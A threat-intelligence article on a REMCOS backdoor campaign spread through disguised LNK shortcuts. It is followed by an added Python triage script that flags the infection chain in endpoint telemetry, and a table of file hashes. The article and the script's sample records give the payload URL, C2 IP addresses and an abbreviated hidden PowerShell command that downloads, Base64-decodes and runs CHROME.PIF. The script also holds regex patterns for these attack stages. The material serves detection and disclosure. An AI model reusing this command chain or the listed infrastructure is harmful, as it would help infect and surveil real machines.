Cybersecurity researchers have identified a sophisticated malware campaign utilizing malicious Windows shortcut (LNK) files to deliver the REMCOS backdoor, demonstrating how threat actors continue to evolve their tactics to bypass security measures.
The attack, identified through analysis of the file “ORDINE-DI-ACQUIST-7263535” (SHA256: 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6), showcases a multi-stage infection process that exploits trusted system utilities to maintain stealth throughout the compromise.
Fileless Attack Chain Exploits PowerShell for Stealthy Deployment
The attack begins with a deceptively simple LNK file disguised as a legitimate document or invoice, distributed primarily through phishing emails or malicious downloads.
When executed, the shortcut triggers a hidden PowerShell command that initiates a three-stage infection process without triggering traditional macro security warnings.

The first stage involves downloading a Base64-encoded payload from “shipping-hr.ro/m/r/r.txt” and saving it as “HEW.GIF” in the Windows ProgramData directory.
The PowerShell command then decodes this Base64 content into a binary executable named “CHROME.PIF,” effectively transforming what appears to be an image file into a functional malware payload.
This technique allows the malware to operate entirely in memory during initial stages, making detection significantly more challenging for traditional antivirus solutions.
The final stage executes the CHROME.PIF file, which serves as a Program Information File (PIF) – a format that can run DOS programs and often evades scrutiny due to Windows’ default extension hiding behavior.
This multi-stage approach effectively bypasses many security controls by leveraging legitimate Windows functionality throughout the infection chain.
REMCOS Backdoor Establishes Comprehensive System Control
Once deployed, the REMCOS backdoor, written in C++, establishes communication with command-and-control servers, including the IP addresses 92.82.184.33 (Romania) and 198.23.251.10 (United States), over TLSv1.2.
The malware demonstrates extensive capabilities, including keystroke logging, screenshot capture, webcam and microphone access, and arbitrary command execution.
Technical analysis reveals that the backdoor utilizes the SetWindowsHookExA API from user32.dll to inject keyboard monitoring hooks, creating comprehensive surveillance capabilities.
All captured data is stored in a “logs.dat” file within a “remcos” folder in the ProgramData directory, providing persistent access to victim activities.
The malware also establishes persistence through registry modifications and creates additional files, including “Xufewgoz.url” and batch files to maintain system access across reboots.
Security experts recommend implementing multi-layered defense strategies, including updated antivirus solutions, user education about suspicious attachments, and regular system monitoring to detect unusual PowerShell activity.
Organizations should particularly focus on monitoring ProgramData directory modifications and network connections to suspicious domains as key indicators of compromise.
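To make the monitoring advice above concrete, here is an added detection example (not code from the original report) that scores simplified endpoint telemetry against the chain described in this article: a PowerShell process spawned from Explorer with a hidden window, a download and Base64 decode into ProgramData, execution of a .PIF image, and network or file events matching the published indicators. The record format (dicts with `event`, `image`, `parent_image`, `command_line`, `dest_ip`, `path`, `sha256`) is an assumption standing in for Sysmon process-create, network-connect and file-create events; the sample records are constructed and the command line in them is deliberately abbreviated with `...`.

```python
"""Heuristic triage for the LNK -> PowerShell -> CHROME.PIF -> REMCOS chain.

Added example, not from the original report. The record layout is an
assumption (a flattened stand-in for Sysmon event 1/3/11), and the sample
records below are constructed for this example.
"""
import re

# Indicators of compromise quoted in the report
IOC_SHA256 = {
    "506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6",  # ORDINE-DI-ACQUIST-7263535
    "5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2",  # CHROME.PIF
    "8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1",  # HEW.GIF
}
IOC_DOMAINS = {"shipping-hr.ro"}
IOC_IPS = {"92.82.184.33", "198.23.251.10"}
IOC_PATHS = re.compile(
    r"\\ProgramData\\(?:remcos\\logs\.dat|HEW\.GIF|CHROME\.PIF|Xufewgoz\.url)$", re.I)

# Behavioural patterns that keep working after the actor rotates hashes,
# domains or file names; each one corresponds to a stage of the chain.
BEHAVIOUR = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("web_download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("base64_decode", re.compile(r"FromBase64String", re.I)),
    ("programdata_drop", re.compile(r"ProgramData\\[^\s\"']+\.(?:gif|png|jpg|txt)\b", re.I)),
    ("pif_launch", re.compile(r"\.pif\b", re.I)),
]
PROCESS_THRESHOLD = 2  # alert when two or more stages show up in one process record


def check_process(rec):
    """Return the reasons a process-creation record looks like the chain."""
    reasons = []
    image = rec.get("image", "").lower()
    parent = rec.get("parent_image", "").lower()
    cmd = rec.get("command_line", "")
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        reasons.append("powershell_from_explorer")  # what a double-clicked LNK looks like
    reasons.extend(name for name, rx in BEHAVIOUR if rx.search(cmd))
    if image.endswith(".pif"):
        reasons.append("pif_image")
    return reasons


def check_network(rec):
    """Return IoC hits for a network-connection record."""
    reasons = []
    if rec.get("dest_ip") in IOC_IPS:
        reasons.append("c2_ip")
    host = rec.get("dest_host", "").lower()
    if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
        reasons.append("c2_domain")
    return reasons


def check_file(rec):
    """Return IoC hits for a file-creation record carrying a SHA-256."""
    reasons = []
    if rec.get("sha256", "").lower() in IOC_SHA256:
        reasons.append("known_hash")
    if IOC_PATHS.search(rec.get("path", "")):
        reasons.append("known_path")
    return reasons


def triage(records):
    """Return (index, reasons) for every record that should raise an alert."""
    alerts = []
    for i, rec in enumerate(records):
        kind = rec.get("event")
        if kind == "process":
            reasons = check_process(rec)
            if len(reasons) >= PROCESS_THRESHOLD:
                alerts.append((i, reasons))
        elif kind == "network":
            reasons = check_network(rec)
            if reasons:
                alerts.append((i, reasons))
        elif kind == "file":
            reasons = check_file(rec)
            if reasons:
                alerts.append((i, reasons))
    return alerts


# Constructed sample telemetry; the malicious command line is abbreviated.
SAMPLE_RECORDS = [
    {"event": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -c "... DownloadFile(hxxp://shipping-hr.ro/m/r/r.txt, C:\ProgramData\HEW.GIF) ... FromBase64String(...) ... Start-Process C:\ProgramData\CHROME.PIF"'},
    {"event": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"event": "network", "image": r"C:\ProgramData\CHROME.PIF",
     "dest_ip": "92.82.184.33", "dest_port": 443},
    {"event": "file", "image": "powershell.exe", "path": r"C:\ProgramData\HEW.GIF",
     "sha256": "8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1"},
    {"event": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "1.1.1.1", "dest_port": 443},
]

if __name__ == "__main__":
    for index, why in triage(SAMPLE_RECORDS):
        print(f"record {index}: {', '.join(why)}")
```

The process check deliberately needs two stages before it alerts, so an ordinary user launching an administrative script from a shortcut (record 1) stays quiet, while the network and file checks fire on a single indicator hit because those are exact matches against the published IoCs rather than heuristics.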
Indicators of compromise
SHA-256 and file name:

| File | SHA-256 |
| --- | --- |
| ORDINE-DI-ACQUIST-7263535 | 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6 |
| CHROME.PIF | 5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2 |
| HEW.GIF | 8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1 |